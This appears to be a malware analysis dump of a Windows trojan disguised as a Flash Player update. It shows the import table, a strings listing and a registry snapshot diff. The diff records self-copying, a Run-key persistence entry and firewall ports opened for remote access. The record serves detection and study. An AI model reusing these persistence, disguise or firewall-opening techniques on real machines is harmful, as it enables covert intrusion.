IMPQueryIMEA USER32 0041EB1C CloseWindowStation USER32 0041EB20 GetGuiResources USER32 0041EB24 GetPropW USER32 0041EB28 SetActiveWindow USER32 0041EB2C CharNextExA USER32 0041EB30 IsRectEmpty USER32 0041EB34 LockSetForegroundWindow USER32 0041EB38 SetScrollRange USER32 0041EB3C EnumPropsExW USER32 0041EB40 PostMessageA USER32 0041EB44 GetClassInfoExW USER32 0041EB48 UpdateWindow USER32 0041EB4C GetFocus USER32 0041EB50 GetWindow USER32 0041EB54 PaintDesktop USER32 0041EB58 GetKeyboardLayout USER32 0041EB5C ChangeMenuA USER32 0041EB60 GetThreadDesktop USER32 0041EB64 CharLowerBuffW USER32 0041EB6C RegOpenKeyExW ADVAPI32 -------------- stringzzz -------------- .text:004157E4 00000013 C 3「H4j.JYb-菫ﾂ\n驟ﾍ .data:0041C02C 0000000C C CreateFileW .data:0041C038 00000009 C kernel32 .data:0041EB76 0000000A C GetCPInfo .data:0041EB82 0000000D C VirtualAlloc .data:0041EB92 0000000D C LoadLibraryA .data:0041EBA2 0000000F C GetProcAddress .data:0041EBB4 00000015 C GetWindowsDirectoryW .data:0041EBCC 00000009 C lstrcatW .data:0041EBD8 0000000C C CreateFileW .data:0041EBE4 0000000D C KERNEL32.dll .data:0041EBF4 0000000A C LoadIconA .data:0041EC00 00000013 C CreateIconIndirect .data:0041EC16 0000000D C GetDlgCtrlID .data:0041EC26 0000000D C GetScrollPos .data:0041EC36 0000001C C RegisterDeviceNotificationA .data:0041EC54 00000012 C DdeEnableCallback .data:0041EC68 0000000B C DrawStateA .data:0041EC76 00000014 C MessageBoxIndirectW .data:0041EC8C 0000000A C LoadMenuA .data:0041EC98 00000015 C GetTabbedTextExtentA .data:0041ECB0 00000010 C UnpackDDElParam .data:0041ECC2 00000018 C DialogBoxIndirectParamW .data:0041ECDC 0000000A C ToAsciiEx .data:0041ECE8 00000009 C IsWindow .data:0041ECF4 00000014 C LoadKeyboardLayoutA .data:0041ED0A 0000000A C GetCursor .data:0041ED16 00000016 C UserHandleGrantAccess .data:0041ED2E 0000000D C GetMenuState .data:0041ED3E 00000011 C SetMenuItemInfoA .data:0041ED52 0000000F C TabbedTextOutW .data:0041ED64 0000000C C mouse_event .data:0041ED72 00000011 C DdeSetUserHandle .data:0041ED86 0000000E C SetWindowWord .data:0041ED96 00000010 C SetDlgItemTextW .data:0041EDA8 00000007 C IsMenu .data:0041EDB2 0000000F C SetWindowTextW .data:0041EDC4 0000000E C GetSystemMenu .data:0041EDD4 0000000F C RegisterClassA .data:0041EDE6 00000019 C ChangeDisplaySettingsExW .data:0041EE02 0000000C C SetMenuInfo .data:0041EE10 0000000C C GetKeyState .data:0041EE1E 00000015 C ChildWindowFromPoint .data:0041EE36 00000014 C LoadCursorFromFileW .data:0041EE4C 00000015 C SendMessageCallbackA .data:0041EE64 00000014 C DdeKeepStringHandle .data:0041EE7A 0000000C C FlashWindow .data:0041EE88 00000009 C OpenIcon .data:0041EE94 0000000B C CreateMenu .data:0041EEA2 0000000C C FindWindowW .data:0041EEB0 0000000C C GetIconInfo .data:0041EEBE 0000000E C GetWindowInfo .data:0041EECE 00000014 C IsCharAlphaNumericA .data:0041EEE4 0000000A C FrameRect .data:0041EEF0 0000000E C FlashWindowEx .data:0041EF00 0000000D C SetSysColors .data:0041EF10 0000000B C GetCapture .data:0041EF1E 00000010 C DdeGetLastError .data:0041EF30 00000010 C SetWindowsHookA .data:0041EF42 00000013 C PostThreadMessageA .data:0041EF58 00000011 C TranslateMessage .data:0041EF6C 00000010 C GetDlgItemTextA .data:0041EF7E 0000000F C GetShellWindow .data:0041EF90 00000018 C CreateAcceleratorTableW .data:0041EFAA 0000000C C DrawMenuBar .data:0041EFB8 0000000E C DdeDisconnect .data:0041EFC8 00000011 C SetClipboardData .data:0041EFDC 00000013 C CreateDialogParamW .data:0041EFF2 0000000C C ToUnicodeEx .data:0041F000 00000010 C CreatePopupMenu .data:0041F012 0000000D C IMPQueryIMEA .data:0041F022 00000013 C CloseWindowStation .data:0041F038 00000010 C GetGuiResources .data:0041F04A 00000009 C GetPropW .data:0041F056 00000010 C SetActiveWindow .data:0041F068 0000000C C CharNextExA .data:0041F076 0000000C C IsRectEmpty .data:0041F084 00000018 C LockSetForegroundWindow .data:0041F09E 0000000F C SetScrollRange .data:0041F0B0 0000000D C EnumPropsExW .data:0041F0C0 0000000D C PostMessageA .data:0041F0D0 00000010 C GetClassInfoExW .data:0041F0E2 0000000D C UpdateWindow .data:0041F0F2 00000009 C GetFocus .data:0041F0FE 0000000A C GetWindow .data:0041F10A 0000000D C PaintDesktop .data:0041F11A 00000012 C GetKeyboardLayout .data:0041F12E 0000000C C ChangeMenuA .data:0041F13C 00000011 C GetThreadDesktop .data:0041F150 0000000F C CharLowerBuffW .data:0041F160 0000000B C USER32.dll .data:0041F16E 0000000E C RegOpenKeyExW .data:0041F17C 0000000D C ADVAPI32.dll .rsrc:00420004 00000005 C *&~P .rsrc:0042002C 00000005 C *&~P .rsrc:004200BC 00000005 C *&~P .rsrc:004200E4 00000005 C *&~P .rsrc:0042010C 00000005 C *&~P .rsrc:00420134 00000005 C *&~P .rsrc:0042015C 00000005 C *&~P .rsrc:00420184 00000005 C *&~P .rsrc:004201AC 00000005 C *&~P .rsrc:004201D4 00000005 C *&~P .rsrc:004201FC 00000005 C *&~P .rsrc:00420224 00000005 C *&~P .rsrc:0042024C 00000005 C *&~P .rsrc:00420274 00000005 C *&~P .rsrc:0042029C 00000005 C *&~P .rsrc:004202C4 00000005 C *&~P .rsrc:004202EC 00000005 C *&~P .rsrc:00420314 00000005 C *&~P .rsrc:0042033C 00000005 C *&~P .rsrc:004203BC 00000005 C *&~P .rsrc:004203E4 00000005 C *&~P .rsrc:0042040C 00000005 C *&~P .rsrc:00420434 00000005 C *&~P .rsrc:0042045C 00000005 C *&~P .rsrc:00420484 00000005 C *&~P .rsrc:004204AC 00000005 C *&~P .rsrc:004204D4 00000005 C *&~P .rsrc:004204FC 00000005 C *&~P .rsrc:00420524 00000005 C *&~P .rsrc:0042054C 00000005 C *&~P .rsrc:00420574 00000005 C *&~P .rsrc:0042059C 00000005 C *&~P .rsrc:004205C4 00000005 C *&~P .rsrc:004205EC 00000005 C *&~P .rsrc:00420604 00000005 C *&~P .rsrc:004207D9 0000000D C wwwwwwwwwwwwx .rsrc:004207E9 0000000D C wwwwwwwwwwwwx .rsrc:004207F9 0000000D C w\"wwwwwwwxwwx .rsrc:0042080B 00000006 C wwwwp .rsrc:00420819 00000007 C wwwwwwx .rsrc:00420829 0000000D C wwwwwwwwwwwwx .rsrc:0042087B 0000000A C wwwwwwwwwx .rsrc:0042096B 0000000A C wwwwwwwwwx .rsrc:0042098A 0000000A C \bwwwwwwwww .rsrc:0042099C 00000009 C wwpwwwwww .rsrc:00420AD1 0000000E C wwwwwwwwwwwwww .rsrc:00420C11 0000000E C wwwwwwwwwwwwww .rsrc:00420C21 0000000B C DDDDDDDDD@ .rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap .rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap .rsrc:00420C51 0000000E C DDDDDDDDDDDDDD .rsrc:00420C61 0000000E C wwwwwwwwwwwwww .rsrc:00420DE9 00000006 C DDDDDD .rsrc:00420DF1 00000006 C wwwwww .rsrc:00420ECA 00000006 C / .rsrc:00420ED2 00000006 C \"\"\"\"/ .rsrc:00420EDA 00000006 C / .rsrc:00420EE2 00000006 C \"\"\"\"/ .rsrc:00420EEA 00000006 C / .rsrc:00420EF2 00000006 C \"\"\"\"/ .rsrc:00420EFA 00000006 C / .rsrc:00420F02 00000006 C \"\"\"\"/ .rsrc:00420F0A 00000006 C / .rsrc:00420F12 00000006 C \"\"\"\"/ .rsrc:00420F1A 00000006 C / .rsrc:00420FFA 00000006 C \"\"\"\"/ .rsrc:00421002 00000006 C / .rsrc:0042100A 00000006 C \"\"\"\"/ .rsrc:00421012 00000006 C / .rsrc:0042101A 00000006 C \"\"\"\"/ .rsrc:00421022 00000006 C / .rsrc:0042102A 00000006 C \"\"\"\"/ .rsrc:00421032 00000006 C / .rsrc:0042103A 00000006 C \"\"\"\"/ .rsrc:00421042 00000006 C / .rsrc:0042112A 00000006 C / .rsrc:00421132 00000006 C \"\"\"\"/ .rsrc:0042113A 00000006 C / .rsrc:00421142 00000006 C \"\"\"\"/ .rsrc:0042114A 00000006 C / .rsrc:00421152 00000006 C \"\"\"\"/ .rsrc:0042115A 00000006 C / .rsrc:00421162 00000006 C \"\"\"\"/ .rsrc:0042116A 00000006 C / .rsrc:0042125A 00000006 C \"\"\"\"/ .rsrc:00421262 00000006 C / .rsrc:0042126A 00000006 C \"\"\"\"/ .rsrc:00421272 00000006 C / .rsrc:0042127A 00000006 C \"\"\"\"/ .rsrc:00421282 00000006 C / .rsrc:0042128A 00000006 C \"\"\"\"/ .rsrc:00421292 00000006 C / .rsrc:0042138A 00000006 C / .rsrc:00421392 00000006 C \"\"\"\"/ .rsrc:0042139A 00000006 C / .rsrc:004213A2 00000006 C \"\"\"\"/ .rsrc:004213AA 00000006 C / .rsrc:004213B2 00000006 C \"\"\"\"/ .rsrc:004213BA 00000006 C / .rsrc:004214BA 00000006 C \"\"\"\"/ .rsrc:004214C2 00000006 C / .rsrc:004214CA 00000006 C \"\"\"\"/ .rsrc:004214D2 00000006 C / .rsrc:004214DA 00000006 C \"\"\"\"/ .rsrc:004214E2 00000006 C / .rsrc:004215EA 00000006 C / .rsrc:004215F2 00000006 C \"\"\"\"/ .rsrc:004215FA 00000006 C / .rsrc:00421602 00000006 C \"\"\"\"/ .rsrc:0042160A 00000006 C / .rsrc:0042171A 00000006 C \"\"\"\"/ .rsrc:00421722 00000006 C / .rsrc:0042172A 00000006 C \"\"\"\"/ .rsrc:00421732 00000006 C / .rsrc:0042184A 00000006 C / .rsrc:00421852 00000006 C \"\"\"\"/ .rsrc:0042185A 00000006 C / .rsrc:0042197A 00000006 C \"\"\"\"/ .rsrc:00421982 00000006 C / .rsrc:00421AAA 00000006 C / ===================== behavior check: ===================== Self deleted, drops: 1154656.exe payload (self copied), and using CMD command to self exec see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg REGISTRY: ---------------------------------- Keys added:26 ---------------------------------- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR ---------------------------------- Values added:112 ---------------------------------- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}" HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002 HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000 HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599" HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}" HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002 HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599" HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe"" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネットディレクトリサービス" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネットディレクトリサービス" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネットディレクトリサービス" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D 